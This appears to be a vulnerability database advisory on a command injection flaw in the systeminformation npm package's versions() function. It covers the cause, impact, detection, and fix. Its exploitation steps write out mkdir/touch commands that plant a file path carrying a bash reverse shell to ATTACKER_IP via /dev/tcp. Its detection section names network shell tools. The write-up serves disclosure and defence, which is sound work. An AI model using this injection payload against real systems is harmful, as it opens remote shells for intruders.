
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-26318 is an OS command injection vulnerability in the systeminformation npm package, affecting all versions up to and including 5.30.7. The flaw exists in the versions() function on Linux, where output from the locate command is concatenated unsanitized into a shell exec() call when detecting the PostgreSQL binary version. It was discovered by researcher Sanu1999, reported via GitHub Private Security Advisory, and published on February 17, 2026, with the NVD entry following on February 19, 2026. The package has over 5 million weekly downloads. The CVSS v3.1 base score is 8.8 (High) (GitHub Advisory).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In lib/osinfo.js, the versions() function runs exec('locate bin/postgres', ...) and then directly concatenates the last (alphabetically sorted) result into a second exec() call as postgresqlBin[postgresqlBin.length - 1] + ' -V' — with no call to the library's own sanitizeShellString(), no path validation, and no use of execFile(). Because Linux allows semicolons in filenames and exec() passes strings through /bin/sh -c, an attacker who can create a file with a semicolon-containing path (e.g., /var/tmp/x;touch /tmp/pwned;/bin/postgres) and wait for updatedb to index it can inject arbitrary shell commands. Exploitation requires: a Linux target, locate/plocate installed, a PostgreSQL binary already in the locate database, the ability to create files in any updatedb-indexed directory, and the locate database to be refreshed (typically via a daily systemd timer) (GitHub Advisory, Patch Commit).
Successful exploitation allows a local attacker with low privileges to execute arbitrary OS commands with the privileges of the Node.js process running systeminformation — typically a monitoring agent or backend service account. This can result in full confidentiality, integrity, and availability compromise of the affected system, including unauthorized data access (e.g., reading /etc/shadow), file creation/modification, reverse shell establishment, and potential lateral movement to cloud credentials, database connections, or internal APIs accessible to the process. In multi-tenant, CI/CD, or containerized environments, the impact can extend beyond the initial host (GitHub Advisory).
No public proof-of-concept exploit code has been released beyond the detailed technical write-up in the GitHub Security Advisory itself, which includes step-by-step exploitation instructions and post-exploitation payloads. There is no evidence of in-the-wild exploitation or threat actor attribution at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.054% (0.000540), placing it in the 6th percentile for exploitation probability within 30 days (GitHub Advisory, Feedly).
systeminformation ≤ 5.30.7 (e.g., monitoring dashboards, server health agents). Confirm locate/plocate is installed (which locate) and that a PostgreSQL binary is indexed (locate bin/postgres).updatedb runs on a daily schedule via systemctl list-timers | grep plocate or equivalent cron job, which will index newly created files.mkdir -p "/var/tmp/x;bash -i >&/dev/tcp/ATTACKER_IP/4444 0>&1;/bin"
touch "/var/tmp/x;bash -i >&/dev/tcp/ATTACKER_IP/4444 0>&1;/bin/postgres"updatedb to run (or trigger it if privileges allow: sudo updatedb). Verify the malicious path appears: locate bin/postgres.locate output alphabetically and selects the last entry. Since /var/ sorts after /usr/, the malicious path is selected over the legitimate PostgreSQL binary.si.versions('postgresql') causes the library to execute the injected command via /bin/sh -c, establishing a reverse shell or executing the attacker's payload with the Node.js process's privileges./tmp, /var/tmp, or user home directories (e.g., /var/tmp/x;COMMAND;/bin/postgres); unexpected files created in /tmp by the application service account (e.g., /tmp/SI_RCE_PROOF or similar artifacts).bash, curl, wget, nc, or python, especially with network connection arguments; reverse shell connections originating from the Node.js service account.versions() calls followed by unexpected command output or errors; system auth logs showing privilege escalation from the application service account; updatedb or plocate logs showing recent database updates coinciding with suspicious file creation (GitHub Advisory).Upgrade the systeminformation npm package to version 5.31.0 or later, which replaces the vulnerable exec() call with execFile() (preventing shell metacharacter interpretation) and adds a safe path filter (/^[a-zA-Z0-9/_.-]+$/) to validate locate output before use (Patch Commit). IBM Maximo Application Suite users using systeminformation 5.28.5–5.28.7 should refer to the IBM security bulletin for remediation guidance (IBM Advisory). As interim mitigations: restrict local filesystem write access for untrusted users on systems running vulnerable versions, apply the principle of least privilege to the Node.js process, and monitor for suspicious child process spawning from the application.
The Hacker Wire published a technical article covering the command injection in the versions() function shortly after disclosure (The Hacker Wire). The advisory notes that this is at least the tenth command injection CVE in the systeminformation package, following a consistent pattern of unsanitized external data reaching exec() calls — a point highlighted in the security advisory itself. IBM issued a security bulletin acknowledging the impact on its Maximo Application Suite Monitor Component (IBM Advisory). AWS also addressed the vulnerability in a release of its Dynamic Image Transformation for Amazon CloudFront solution.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."